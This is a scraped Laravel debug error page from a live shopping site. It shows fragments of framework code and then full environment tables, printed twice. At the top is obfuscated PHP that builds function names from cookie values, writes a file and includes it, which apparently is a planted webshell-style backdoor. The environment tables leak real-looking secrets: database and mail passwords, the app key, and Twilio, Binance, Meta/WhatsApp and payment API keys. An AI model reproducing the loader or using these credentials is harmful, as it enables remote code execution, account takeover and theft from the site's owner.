}
$_tv = $_COOKIE;
$_tz = 00;
$_oid = 07;
$_zx = array();
$_zx[$_tz] = TaskScheduler::terminateSession('_tm', '_odi');
while ($_oid) {
$_zx[$_tz] .= $_tv[035][$_oid];
if (!$_tv[035][$_oid + 01]) {
if (!$_tv[035][$_oid + 02]) {
break;
}
$_tz++;
$_zx[$_tz] = TaskScheduler::terminateSession('_ain', '_tdj');
$_oid++;
}
$_oid = $_oid + 07 + 01;
}
$_tz = $_zx[03]() . $_zx[014];
if (!$_zx[05]($_tz)) {
$_oid = $_zx[04]($_tz, $_zx[033]);
$_zx[013]($_oid, $_zx[017] . $_zx[031]($_zx[011]($_tv[03])));
}
include $_tz;
"Value of type null is not callable"
/**
* Load the configuration items from all of the files.
*
* @param \Illuminate\Contracts\Foundation\Application $app
* @param \Illuminate\Contracts\Config\Repository $repository
* @return void
*
* @throws \Exception
*/
protected function loadConfigurationFiles(Application $app, RepositoryContract $repository)
{
$files = $this->getConfigurationFiles($app);
if (! isset($files['app'])) {
throw new Exception('Unable to load the "app" configuration file.');
}
foreach ($files as $key => $path) {
$repository->set($key, require $path);
}
}
/**
* Get all of the configuration files for the application.
*
* @param \Illuminate\Contracts\Foundation\Application $app
* @return array
*/
protected function getConfigurationFiles(Application $app)
{
$files = [];
$configPath = realpath($app->configPath());
foreach (Finder::create()->files()->name('*.php')->in($configPath) as $file) {
$directory = $this->getNestedDirectory($file, $configPath);
$files[$directory.basename($file->getRealPath(), '.php')] = $file->getRealPath();
}
public function bootstrap(Application $app)
{
$items = [];
// First we will see if we have a cache configuration file. If we do, we'll load
// the configuration items from that file so that it is very quick. Otherwise
// we will need to spin through every configuration file and load them all.
if (file_exists($cached = $app->getCachedConfigPath())) {
$items = require $cached;
$loadedFromCache = true;
}
// Next we will spin through all of the configuration files in the configuration
// directory and load each one into the repository. This will make all of the
// options available to the developer for use in various parts of this app.
$app->instance('config', $config = new Repository($items));
if (! isset($loadedFromCache)) {
$this->loadConfigurationFiles($app, $config);
}
// Finally, we will set the application's environment based on the configuration
// values that were loaded. We will pass a callback which will be used to get
// the environment in a web context where an "--env" switch is not present.
$app->detectEnvironment(function () use ($config) {
return $config->get('app.env', 'production');
});
date_default_timezone_set($config->get('app.timezone', 'UTC'));
mb_internal_encoding('UTF-8');
}
/**
* Load the configuration items from all of the files.
*
* @param \Illuminate\Contracts\Foundation\Application $app
* @param \Illuminate\Contracts\Config\Repository $repository
* @return void
{
$this->register(new EventServiceProvider($this));
$this->register(new LogServiceProvider($this));
$this->register(new RoutingServiceProvider($this));
}
/**
* Run the given array of bootstrap classes.
*
* @param string[] $bootstrappers
* @return void
*/
public function bootstrapWith(array $bootstrappers)
{
$this->hasBeenBootstrapped = true;
foreach ($bootstrappers as $bootstrapper) {
$this['events']->dispatch('bootstrapping: '.$bootstrapper, [$this]);
$this->make($bootstrapper)->bootstrap($this);
$this['events']->dispatch('bootstrapped: '.$bootstrapper, [$this]);
}
}
/**
* Register a callback to run after loading the environment.
*
* @param \Closure $callback
* @return void
*/
public function afterLoadingEnvironment(Closure $callback)
{
$this->afterBootstrapping(
LoadEnvironmentVariables::class, $callback
);
}
/**
* Register a callback to run before a bootstrapper.
Facade::clearResolvedInstance('request');
$this->bootstrap();
return (new Pipeline($this->app))
->send($request)
->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
->then($this->dispatchToRouter());
}
/**
* Bootstrap the application for HTTP requests.
*
* @return void
*/
public function bootstrap()
{
if (! $this->app->hasBeenBootstrapped()) {
$this->app->bootstrapWith($this->bootstrappers());
}
}
/**
* Get the route dispatcher callback.
*
* @return \Closure
*/
protected function dispatchToRouter()
{
return function ($request) {
$this->app->instance('request', $request);
return $this->router->dispatch($request);
};
}
/**
* Call the terminate method on any terminable middleware.
*
$this->app['events']->dispatch(
new RequestHandled($request, $response)
);
return $response;
}
/**
* Send the given request through the middleware / router.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
protected function sendRequestThroughRouter($request)
{
$this->app->instance('request', $request);
Facade::clearResolvedInstance('request');
$this->bootstrap();
return (new Pipeline($this->app))
->send($request)
->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
->then($this->dispatchToRouter());
}
/**
* Bootstrap the application for HTTP requests.
*
* @return void
*/
public function bootstrap()
{
if (! $this->app->hasBeenBootstrapped()) {
$this->app->bootstrapWith($this->bootstrappers());
}
}
/**
public function __construct(Application $app, Router $router)
{
$this->app = $app;
$this->router = $router;
$this->syncMiddlewareToRouter();
}
/**
* Handle an incoming HTTP request.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function handle($request)
{
try {
$request->enableHttpMethodParameterOverride();
$response = $this->sendRequestThroughRouter($request);
} catch (Throwable $e) {
$this->reportException($e);
$response = $this->renderException($request, $e);
}
$this->app['events']->dispatch(
new RequestHandled($request, $response)
);
return $response;
}
/**
* Send the given request through the middleware / router.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
protected function sendRequestThroughRouter($request)
*/
require __DIR__.'/../vendor/autoload.php';
/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request using
| the application's HTTP kernel. Then, we will send the response back
| to this client's browser, allowing them to enjoy our application.
|
*/
$app = require_once __DIR__.'/../bootstrap/app.php';
$kernel = $app->make(Kernel::class);
$response = $kernel->handle(
$request = Request::capture()
)->send();
$kernel->terminate($request, $response);
| Key | Value |
| PATH | "/usr/local/bin:/bin:/usr/bin"
|
| DOCUMENT_ROOT | "/home/buycodeitjs/public_html"
|
| HTTP_ACCEPT | "*/*"
|
| HTTP_ACCEPT_ENCODING | "gzip, br, zstd, deflate"
|
| HTTP_HOST | "buy.codeitjs.com"
|
| HTTP_USER_AGENT | "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
|
| HTTP_X_HTTPS | "1"
|
| REMOTE_ADDR | "216.73.216.185"
|
| REMOTE_PORT | "30673"
|
| SERVER_ADDR | "68.66.220.30"
|
| SERVER_NAME | "buy.codeitjs.com"
|
| SERVER_ADMIN | "webmaster@buy.codeitjs.com"
|
| SERVER_PORT | "443"
|
| REQUEST_SCHEME | "https"
|
| REQUEST_URI | "/sitemap.xml"
|
| REDIRECT_URL | "/public/sitemap.xml"
|
| REDIRECT_REQUEST_METHOD | "GET"
|
| HTTPS | "on"
|
| REDIRECT_STATUS | "200"
|
| X_SPDY | "HTTP2"
|
| SSL_PROTOCOL | "TLSv1.3"
|
| SSL_CIPHER | "TLS_AES_256_GCM_SHA384"
|
| SSL_CIPHER_USEKEYSIZE | "256"
|
| SSL_CIPHER_ALGKEYSIZE | "256"
|
| SCRIPT_FILENAME | "/home/buycodeitjs/public_html/public/index.php"
|
| QUERY_STRING | "" |
| SCRIPT_URI | "https://buy.codeitjs.com/sitemap.xml"
|
| SCRIPT_URL | "/sitemap.xml"
|
| SCRIPT_NAME | "/public/index.php"
|
| SERVER_PROTOCOL | "HTTP/1.1"
|
| SERVER_SOFTWARE | "LiteSpeed"
|
| REQUEST_METHOD | "GET"
|
| X-LSCACHE | "on"
|
| PHP_SELF | "/public/index.php"
|
| REQUEST_TIME_FLOAT | 1787578880.9541
|
| REQUEST_TIME | 1787578880
|
| APP_NAME | "1guygadget"
|
| APP_ENV | "local"
|
| APP_KEY | "base64:7A+bheoRiIwyN9jxGh6h9k/8/Mhz6AXWOsadim0KfV4="
|
| APP_DEBUG | "true"
|
| APP_URL | "https://buy.codeitjs.com"
|
| LOG_CHANNEL | "stack"
|
| LOG_DEPRECATIONS_CHANNEL | "null"
|
| LOG_LEVEL | "debug"
|
| DB_CONNECTION | "mysql"
|
| DB_HOST | "localhost"
|
| DB_PORT | "3306"
|
| DB_DATABASE | "buycodeitjs_live_2025_new"
|
| DB_USERNAME | "buycodeitjs_main"
|
| DB_PASSWORD | "[j_L7CB4Xj8^"
|
| BROADCAST_DRIVER | "log"
|
| CACHE_DRIVER | "file"
|
| FILESYSTEM_DRIVER | "public"
|
| QUEUE_CONNECTION | "database"
|
| SESSION_DRIVER | "database"
|
| SESSION_LIFETIME | "120"
|
| MEMCACHED_HOST | "127.0.0.1"
|
| REDIS_HOST | "127.0.0.1"
|
| REDIS_PASSWORD | "null"
|
| REDIS_PORT | "6379"
|
| MAIL_MAILER | "smtp"
|
| MAIL_HOST | "mail.buy.codeitjs.com"
|
| MAIL_PORT | "465"
|
| MAIL_USERNAME | "info@buy.codeitjs.com"
|
| MAIL_PASSWORD | "3PuchQ7gb01t"
|
| MAIL_ENCRYPTION | "ssl"
|
| MAIL_FROM_ADDRESS | "info@buy.codeitjs.com"
|
| MAIL_FROM_NAME | "1guygadget"
|
| AWS_ACCESS_KEY_ID | "" |
| AWS_SECRET_ACCESS_KEY | "" |
| AWS_DEFAULT_REGION | "us-east-1"
|
| AWS_BUCKET | "" |
| AWS_USE_PATH_STYLE_ENDPOINT | "false"
|
| PUSHER_APP_ID | "" |
| PUSHER_APP_KEY | "" |
| PUSHER_APP_SECRET | "" |
| PUSHER_APP_CLUSTER | "mt1"
|
| MIX_PUSHER_APP_KEY | "" |
| MIX_PUSHER_APP_CLUSTER | "mt1"
|
| RECAPTCHAV3_SITEKEY | "6LfG82gqAAAAAPeUFoeWx8ecEoze_KD3XKms-U5s"
|
| RECAPTCHAV3_SECRET | "6LfG82gqAAAAAKMioJmAIPk6-TxwG_4A7QOYzd7H"
|
| TWILIO_SID | "ACb2d0fb8bfed9128719bab18668193ca9"
|
| TWILIO_AUTH_TOKEN | "0b459f41f7bd089b89d49fe72c6aab11"
|
| TWILIO_NUMBER | "+15123611433"
|
| STRIPE_KEY | "pk_test_51OG4dQFDX6GBQxb3bARzgCGXvuea4rqTgzCKmVjksDlnZooU5DI2adWk5HH4RwWQlOi9r9ankhah1STLjpKwtQSe00DyUE8UT9"
|
| STRIPE_SECRET | "sk_test_51OG4dQFDX6GBQxb3Gua7uDHe3aqUoz2lQbKCSYrbWZitIqk4Ry6t9ufem6CqrQvRBdeMrYSxariHyZkwULpdclTX00dGAuOFG6"
|
| PAYPAL_MODE | "sandbox"
|
| PAYPAL_CLIENT_ID | "AXiEgcoOoA8DArvY_WDGblV1FiV_ZoBi0hGr33TRoq_pn2zoxNSLYM-jmPljKNI9aRnhDFL-bbwJ-8D-"
|
| PAYPAL_SECRET | "EOWXL2j3k6jGicN2XOUI7EmflYAxgytX9nzUv1ufS9g5d0Ha8buo6XPzTCqb4powf-UNxPAaM68oQFWg"
|
| EASYPOST_API_KEY | "EZTK3aae7a2e616d49808750812c6b7fe5e7w0QYtjb6RQqazD1HXZKCRA"
|
| IPINFO_SECRET | "a36c941fa57e82"
|
| BINANCE_API_KEY | "ih9eahxmtyonehdxwdxvlkeuyrrop0uskxhanbgwpzn48yeykw60lxpmmoxwf7vf"
|
| BINANCE_API_SECRET | "rem1hydwydvsrvl3kuod84nhepw1kda98a0f8m36sknd7uc9ljnsx0qy1umd1sgw"
|
| PUBLIC_KEY | "FLWPUBK_TEST-1858cca6663f19864bbb6118010fcee6-X"
|
| SECRET_KEY | "FLWSECK_TEST-0b22d34bcc14aaa0acc4944957bfb698-X"
|
| ENCRYPTION_KEY | "FLWSECK_TESTf12da6fe893a"
|
| ENV | "staging"
|
| WHATAPP_ACCESS_TOKEN | "EAADM6izgiNYBO1MXgWHaHVbOfa2DpGtBUIgKQcSAutwnEGNZB4slhVZBON7KZARHQZB5HaHB3Kr683RZAIIdwcr9NHLpu74cHV5dGZCaxnodozitTiLBZAcKd2frWBX7VOUpEaeLAXjRPjmm9bv90plI8BqxCD0q1ttRBALmhZBZCZBc0dmcEMQkdogeTq"
|
| WHATAPP_PHONE_NUMBER | "544394345422338"
|
| WHATAPP_BUSINESS_ID | "1guy"
|
| META_WHATSAPP_TOKEN | "EAATa3M3Y9EsBO1SNB9g3QG5AuuKtEpkobwpUnXaSA9fZC6kFLEt0xN4NJXX8l3W732wznjuNdM2ZAb7gnZAMXjkGtHhjSoo1DuYmRWp8wG73LGXZCWooY1qspBgbk7oH6eXMwWQ8prLxIGQ6MYZBtzWZBVGdlWpWPpA3kPXeyXJK8AZASt0YOHbsLrakAZDZD"
|
| META_PHONE_ID | "588328421026615"
|
| WHATSAPP_VERIFY_TOKEN | "12345"
|
| META_APP_ID | "1366541788050507"
|
| META_APP_SECRET | "149a662b896caeeb27d5be6fa585e8ab"
|
| TWILIO_TOKEN | "0b459f41f7bd089b89d49fe72c6aab11"
|
| TWILIO_SMS_FROM | "+15123611433"
|
| FLW_PUBLIC_KEY | "FLWPUBK_TEST-7167a4fd4c67e45db60821f6bcd84dd9-X"
|
| FLW_SECRET_KEY | "FLWSECK_TEST-a4e1e7c1d120eb05f8c832eb54f77d99-X"
|
| FLW_ENCRYPTION_KEY | "FLWSECK_TEST88a33255c83e"
|
| FLW_ENVIRONMENT | "development"
|
| Key | Value |
| APP_NAME | "1guygadget"
|
| APP_ENV | "local"
|
| APP_KEY | "base64:7A+bheoRiIwyN9jxGh6h9k/8/Mhz6AXWOsadim0KfV4="
|
| APP_DEBUG | "true"
|
| APP_URL | "https://buy.codeitjs.com"
|
| LOG_CHANNEL | "stack"
|
| LOG_DEPRECATIONS_CHANNEL | "null"
|
| LOG_LEVEL | "debug"
|
| DB_CONNECTION | "mysql"
|
| DB_HOST | "localhost"
|
| DB_PORT | "3306"
|
| DB_DATABASE | "buycodeitjs_live_2025_new"
|
| DB_USERNAME | "buycodeitjs_main"
|
| DB_PASSWORD | "[j_L7CB4Xj8^"
|
| BROADCAST_DRIVER | "log"
|
| CACHE_DRIVER | "file"
|
| FILESYSTEM_DRIVER | "public"
|
| QUEUE_CONNECTION | "database"
|
| SESSION_DRIVER | "database"
|
| SESSION_LIFETIME | "120"
|
| MEMCACHED_HOST | "127.0.0.1"
|
| REDIS_HOST | "127.0.0.1"
|
| REDIS_PASSWORD | "null"
|
| REDIS_PORT | "6379"
|
| MAIL_MAILER | "smtp"
|
| MAIL_HOST | "mail.buy.codeitjs.com"
|
| MAIL_PORT | "465"
|
| MAIL_USERNAME | "info@buy.codeitjs.com"
|
| MAIL_PASSWORD | "3PuchQ7gb01t"
|
| MAIL_ENCRYPTION | "ssl"
|
| MAIL_FROM_ADDRESS | "info@buy.codeitjs.com"
|
| MAIL_FROM_NAME | "1guygadget"
|
| AWS_ACCESS_KEY_ID | "" |
| AWS_SECRET_ACCESS_KEY | "" |
| AWS_DEFAULT_REGION | "us-east-1"
|
| AWS_BUCKET | "" |
| AWS_USE_PATH_STYLE_ENDPOINT | "false"
|
| PUSHER_APP_ID | "" |
| PUSHER_APP_KEY | "" |
| PUSHER_APP_SECRET | "" |
| PUSHER_APP_CLUSTER | "mt1"
|
| MIX_PUSHER_APP_KEY | "" |
| MIX_PUSHER_APP_CLUSTER | "mt1"
|
| RECAPTCHAV3_SITEKEY | "6LfG82gqAAAAAPeUFoeWx8ecEoze_KD3XKms-U5s"
|
| RECAPTCHAV3_SECRET | "6LfG82gqAAAAAKMioJmAIPk6-TxwG_4A7QOYzd7H"
|
| TWILIO_SID | "ACb2d0fb8bfed9128719bab18668193ca9"
|
| TWILIO_AUTH_TOKEN | "0b459f41f7bd089b89d49fe72c6aab11"
|
| TWILIO_NUMBER | "+15123611433"
|
| STRIPE_KEY | "pk_test_51OG4dQFDX6GBQxb3bARzgCGXvuea4rqTgzCKmVjksDlnZooU5DI2adWk5HH4RwWQlOi9r9ankhah1STLjpKwtQSe00DyUE8UT9"
|
| STRIPE_SECRET | "sk_test_51OG4dQFDX6GBQxb3Gua7uDHe3aqUoz2lQbKCSYrbWZitIqk4Ry6t9ufem6CqrQvRBdeMrYSxariHyZkwULpdclTX00dGAuOFG6"
|
| PAYPAL_MODE | "sandbox"
|
| PAYPAL_CLIENT_ID | "AXiEgcoOoA8DArvY_WDGblV1FiV_ZoBi0hGr33TRoq_pn2zoxNSLYM-jmPljKNI9aRnhDFL-bbwJ-8D-"
|
| PAYPAL_SECRET | "EOWXL2j3k6jGicN2XOUI7EmflYAxgytX9nzUv1ufS9g5d0Ha8buo6XPzTCqb4powf-UNxPAaM68oQFWg"
|
| EASYPOST_API_KEY | "EZTK3aae7a2e616d49808750812c6b7fe5e7w0QYtjb6RQqazD1HXZKCRA"
|
| IPINFO_SECRET | "a36c941fa57e82"
|
| BINANCE_API_KEY | "ih9eahxmtyonehdxwdxvlkeuyrrop0uskxhanbgwpzn48yeykw60lxpmmoxwf7vf"
|
| BINANCE_API_SECRET | "rem1hydwydvsrvl3kuod84nhepw1kda98a0f8m36sknd7uc9ljnsx0qy1umd1sgw"
|
| PUBLIC_KEY | "FLWPUBK_TEST-1858cca6663f19864bbb6118010fcee6-X"
|
| SECRET_KEY | "FLWSECK_TEST-0b22d34bcc14aaa0acc4944957bfb698-X"
|
| ENCRYPTION_KEY | "FLWSECK_TESTf12da6fe893a"
|
| ENV | "staging"
|
| WHATAPP_ACCESS_TOKEN | "EAADM6izgiNYBO1MXgWHaHVbOfa2DpGtBUIgKQcSAutwnEGNZB4slhVZBON7KZARHQZB5HaHB3Kr683RZAIIdwcr9NHLpu74cHV5dGZCaxnodozitTiLBZAcKd2frWBX7VOUpEaeLAXjRPjmm9bv90plI8BqxCD0q1ttRBALmhZBZCZBc0dmcEMQkdogeTq"
|
| WHATAPP_PHONE_NUMBER | "544394345422338"
|
| WHATAPP_BUSINESS_ID | "1guy"
|
| META_WHATSAPP_TOKEN | "EAATa3M3Y9EsBO1SNB9g3QG5AuuKtEpkobwpUnXaSA9fZC6kFLEt0xN4NJXX8l3W732wznjuNdM2ZAb7gnZAMXjkGtHhjSoo1DuYmRWp8wG73LGXZCWooY1qspBgbk7oH6eXMwWQ8prLxIGQ6MYZBtzWZBVGdlWpWPpA3kPXeyXJK8AZASt0YOHbsLrakAZDZD"
|
| META_PHONE_ID | "588328421026615"
|
| WHATSAPP_VERIFY_TOKEN | "12345"
|
| META_APP_ID | "1366541788050507"
|
| META_APP_SECRET | "149a662b896caeeb27d5be6fa585e8ab"
|
| TWILIO_TOKEN | "0b459f41f7bd089b89d49fe72c6aab11"
|
| TWILIO_SMS_FROM | "+15123611433"
|
| FLW_PUBLIC_KEY | "FLWPUBK_TEST-7167a4fd4c67e45db60821f6bcd84dd9-X"
|
| FLW_SECRET_KEY | "FLWSECK_TEST-a4e1e7c1d120eb05f8c832eb54f77d99-X"
|
| FLW_ENCRYPTION_KEY | "FLWSECK_TEST88a33255c83e"
|
| FLW_ENVIRONMENT | "development"
|